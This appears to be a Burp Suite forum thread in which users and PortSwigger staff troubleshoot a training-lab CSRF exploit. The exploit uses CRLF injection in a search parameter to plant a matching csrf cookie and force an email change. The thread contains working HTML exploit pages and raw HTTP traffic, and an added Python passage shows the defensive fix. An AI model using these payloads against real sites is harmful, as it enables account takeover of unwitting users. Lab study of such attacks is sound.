The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


CSRF LAB BROKEN - CSRF where token is duplicated in cookie

Hamza | Last updated: Jun 03, 2024 09:43AM UTC

Hey Team, when I try to deliver the exploit or test in my browser, this lab gives me "invalid csrf" although I have checked many times. Given is my payload.

    <html>
      <body>
        <h1>Hello World!</h1>
        <form action="https://0a25003904014c148065ad2c00ae00af.web-security-academy.net/my-account/change-email" method="post">
          <input type="hidden" name="email" value="test5@test.ca">
          <input type="hidden" name="csrf" value="hacked">
        </form>
        <img src="https://0a25003904014c148065ad2c00ae00af.web-security-academy.net/?search=hat%0d%0aSet-Cookie:%20csrf=hacked%3b%20SameSite=None" onerror="document.forms[0].submit()">
      </body>
    </html>

Dominyque, PortSwigger Agent | Last updated: Jun 03, 2024 10:19AM UTC

Hi Hamza, as noted in the written solution, your CSRF token needs to have the value 'fake' in order to solve this lab. If you make this change, are you then able to solve the lab?

Hamza | Last updated: Jun 04, 2024 07:38AM UTC

It still gives me invalid csrf.

    <html>
      <body>
        <h1>Hello World!</h1>
        <form action="https://0a65006e0315a2d280db9958009100e4.web-security-academy.net/my-account/change-email" method="post">
          <input type="hidden" name="email" value="newtest5@test.ca">
          <input type="hidden" name="csrf" value="fake">
        </form>
        <img src="https://0a65006e0315a2d280db9958009100e4.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None" onerror="document.forms[0].submit()">
      </body>
    </html>

Dominyque, PortSwigger Agent | Last updated: Jun 04, 2024 07:58AM UTC

Hi Hamza, I can confirm that the lab does solve with the given written solution. Have you changed the email address before storing and delivering the exploit to the victim? I was able to solve the lab with the following exploit:

    <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
        <form action="https://0a93003d0356b3b480ec9a0400340027.web-security-academy.net/my-account/change-email" method="POST">
          <input type="hidden" name="email" value="testy@test.com" />
          <input type="hidden" name="csrf" value="fake" />
          <input type="submit" value="Submit request" />
        </form>
        <img src="https://0a93003d0356b3b480ec9a0400340027.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None" onerror="document.forms[0].submit();"/>
      </body>
    </html>
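The check this lab exercises is a "double submit" comparison: the server only tests whether the csrf cookie equals the csrf form field, which is why an attacker who can get an arbitrary cookie into the victim's browser (here via the CR/LF reflected from the search parameter into a Set-Cookie header) can satisfy it with any value. The Python below is an added illustration from the defender's side and is not part of this thread or of PortSwigger's lab code: it contrasts that naive check with a token bound to the session under a server secret, and adds the header-value validation that would have prevented the extra Set-Cookie line in the first place. The secret, session id and cookie values are constructed for the example; the function names are my own.

```python
import hmac
import hashlib

# Constructed for this example: a server-side secret and a victim session id.
SERVER_SECRET = b"constructed-example-secret-do-not-reuse"
VICTIM_SESSION = "constructed-session-id-0001"


def naive_double_submit_ok(cookie_csrf: str, form_csrf: str) -> bool:
    """The weak pattern: accept whenever the cookie value equals the form value.
    Nothing ties either value to the server or to the logged-in session."""
    return bool(cookie_csrf) and hmac.compare_digest(cookie_csrf, form_csrf)


def issue_bound_token(session_id: str) -> str:
    """Hardened: derive the CSRF token from the session id under a server secret.
    A cookie the browser was tricked into storing only passes if it equals the
    value this server would have derived for the same session."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def bound_double_submit_ok(session_id: str, cookie_csrf: str, form_csrf: str) -> bool:
    """Both the cookie and the form field must match the session-bound expectation."""
    expected = issue_bound_token(session_id)
    return (hmac.compare_digest(cookie_csrf, expected)
            and hmac.compare_digest(form_csrf, expected))


def header_value_is_safe(value: str) -> bool:
    """Root-cause check for the search reflection: refuse CR, LF and other control
    characters, plus the cookie separator, before a user value reaches a response header."""
    return not any(ch in "\r\n;" or ord(ch) < 0x20 or ch == "\x7f" for ch in value)


def safe_set_cookie_header(name: str, value: str) -> str:
    """Build a Set-Cookie header only from validated input; raise instead of emitting
    a header that could carry an injected second Set-Cookie line."""
    if not header_value_is_safe(name) or not header_value_is_safe(value):
        raise ValueError("control character or separator in header value")
    return f"Set-Cookie: {name}={value}; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    # Attacker-chosen pair satisfies the naive check but not the bound one.
    print("naive accepts fake/fake:", naive_double_submit_ok("fake", "fake"))
    print("bound accepts fake/fake:", bound_double_submit_ok(VICTIM_SESSION, "fake", "fake"))
    tok = issue_bound_token(VICTIM_SESSION)
    print("bound accepts legitimate token:", bound_double_submit_ok(VICTIM_SESSION, tok, tok))
    injected = "test\r\nSet-Cookie: csrf=fake; SameSite=None"
    print("reflected search value is safe for a header:", header_value_is_safe(injected))
```

The bound check fails the attacker's pair even though cookie and form field agree, because neither value was derived for the victim's session; and rejecting CR/LF at the point where the search term is written into a header removes the cookie-setting primitive the thread relies on, independent of how the CSRF token is checked.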

P1N | Last updated: Jun 04, 2024 03:38PM UTC

Those are also incorrectly processed by my lab; my payload in search does not read properly. Everything is fine in the response, but the next request does not execute.

request:

    GET /?search=test%0d%0aSet-Cookie:%20csrfKey=idLTTRbgVUktzTkMjEnph7XH5ZkgidNg%3b%20SameSite=None HTTP/2

response:

    HTTP/2 200 OK
    Set-Cookie: LastSearchTerm=test
    Set-Cookie: csrfKey=idLTTRbgVUktzTkMjEnph7XH5ZkgidNg; SameSite=Non; Secure; HttpOnly
    Set-Cookie: session=kQbiYYVQ0pKfGQeLoFbIWROUaSHoj72m; Secure; HttpOnly; SameSite=None

Next request:

    POST /my-account/change-email HTTP/2
    Host: 0a9800f803d7e13f80da94be00c10097.web-security-academy.net
    Cookie: csrfKey=H5AnPN2IfpZe7bJPos8rqbUcIviDZNlz; session=4VVtwDlnyFLYMXm1voOQaGhQM5dwoav3

csrf has not changed, why?

Ben, PortSwigger Agent | Last updated: Jun 05, 2024 08:46AM UTC